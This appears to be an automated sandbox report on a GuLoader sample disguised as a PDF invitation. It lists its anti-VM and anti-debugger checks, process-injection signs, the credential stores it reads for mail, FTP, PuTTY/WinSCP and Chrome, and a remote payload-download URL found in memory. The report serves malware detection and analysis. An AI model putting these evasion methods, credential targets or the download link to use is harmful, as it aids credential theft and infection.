Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_0040271C push 0040130Eh; ret 0_2_0040272F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_0040231C push 0040130Eh; ret 0_2_00402603
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00406F2A push ecx; retf 0_2_00406F3D
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402730 push 0040130Eh; ret 0_2_00402743
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402780 push 0040130Eh; ret 0_2_00402793
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_0040618C push 10768459h; retf 0_2_00406191
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402794 push 0040130Eh; ret 0_2_004027A7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A942C push C30B40E8h; retf 5D80h 0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A313B push cs; retf 0_2_020A313C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A961B push C30B40E8h; retf 5D80h 0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A9635 push C30B40E8h; retf 5D80h 0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A4640 push FFFFFF81h; ret 0_2_020A4642

Persistence and Installation Behavior:

Creates processes with suspicious names
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File created: \anexo i e ii do convite#u00b7pdf.exe
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WOW1V-FWJJB6G5MIGMHVWOYYWXRCNCHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6136 Thread sleep count: 527 > 30
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6988 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020ACEC8 rdtsc 0_2_020ACEC8
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Window / User API: threadDelayed 527
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe System information queried: ModuleInformation
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW'
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020ACEC8 rdtsc 0_2_020ACEC8
Enables debug privileges
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020ADAD0 mov eax, dword ptr fs:[00000030h] 0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AC6DF mov eax, dword ptr fs:[00000030h] 0_2_020AC6DF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020ABA35 mov eax, dword ptr fs:[00000030h] 0_2_020ABA35
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020ADB37 mov eax, dword ptr fs:[00000030h] 0_2_020ADB37
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8EE2 mov eax, dword ptr fs:[00000030h] 0_2_020A8EE2
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AA1B2 LdrInitializeThunk, 0_2_020AA1B2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data